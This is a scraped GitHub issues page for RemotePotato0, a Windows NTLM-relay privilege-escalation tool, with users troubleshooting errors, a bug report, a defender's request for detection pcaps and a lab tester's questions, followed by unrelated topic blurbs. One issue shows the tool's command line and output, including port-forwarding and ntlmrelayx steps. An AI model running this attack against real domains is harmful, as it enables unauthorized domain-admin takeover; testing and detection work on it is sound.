antoniococo / remotepotato0 Goto Github PK
View Code? Open in Web Editor NEWWindows Privilege Escalation from User to Domain Admin.
License: MIT License
Windows Privilege Escalation from User to Domain Admin.
License: MIT License
when i use the prog to test my machine its exception:
[!] Error. Trigger DCOM failed with status: 0x800706ba
how do deal with it
The RPC capture server in charge to grab the ntlmv2 response is using the hardcoded value 268 to hold the data. While there are no particular bugs found on the tested windows, it could have some bugs for win11 and server 2022.
The allocation should be dynamically managed with a malloc() call instead of using a local array with fixed size --> https://github.com/antonioCoco/RemotePotato0/blob/main/RPCCaptureServer.cpp#L168
Can you share the pcaps from your blog post please to help defenders generate detections?
Thanks in advance.
I am attempting to use this and I got the following output on the user machine.
C:\Users\user\Documents>.\RemotePotato0.exe -r 10.1.1.69 -p 1111
[*] Starting the NTLM relay attack, remember to forward tcp port 135 on 10.1.1.69 to your victim machine on port 1111 before and to launch ntlmrelayx on 10.1.1.69!!
[*] RPC relay server listening on port 9997 ...
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 1111 ...
[*] IStoragetrigger written: 104 bytes
[!] Error. CLSID {5167B42F-C111-47A1-ACC4-8EABE61B0B54} not found. Bad path to object.
The user machine is Windows 2016 Standard (build:14393). Do I have to use a different CLSID?
is this attack possible only when the domain admin is logged in with you on the local server? or does it work even if the Admin is only logged in on the Domain Controller?
On windows server prior to 2019 version the JuicyPotato trigger (the one not requiring an external oxid resolution) does not work anymore. It seems that at certain point in time MS has backported the fix of win serv 2019 to the older versions.
See --> https://twitter.com/decoder_it/status/1493916092493877248
A fix should be to use an external oxid resolver like it's already happening for windows server 2019.
Hello!
I've been reading the tech papers about this exploit and, admittedly, it caused my brain to leak out of my ears and onto my keyboard :-)
So I staged up a test DC, joined some Win10 machines to it and looked to recreate the exploit in action. It worked as advertised, which was awesome! However, I found that by default the average/default AD user doesn't have WinRm capability into anything in my server subnet, so I had to explicitly add my test user (Student10) into the Remote Management Users group. Once I did that and ran RemotePotato0, the fireworks flew:
So my newb question is: do you think in most AD environments this exploit is slightly less of a threat unless the admins have specifically configured a bunch of users/groups to have WinRm/SSH privs? Or is it a "I'm not doing it right" kind of situation where I can leverage RemotePotato0 in more common configuration scenarios?
Thanks!
Brian
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.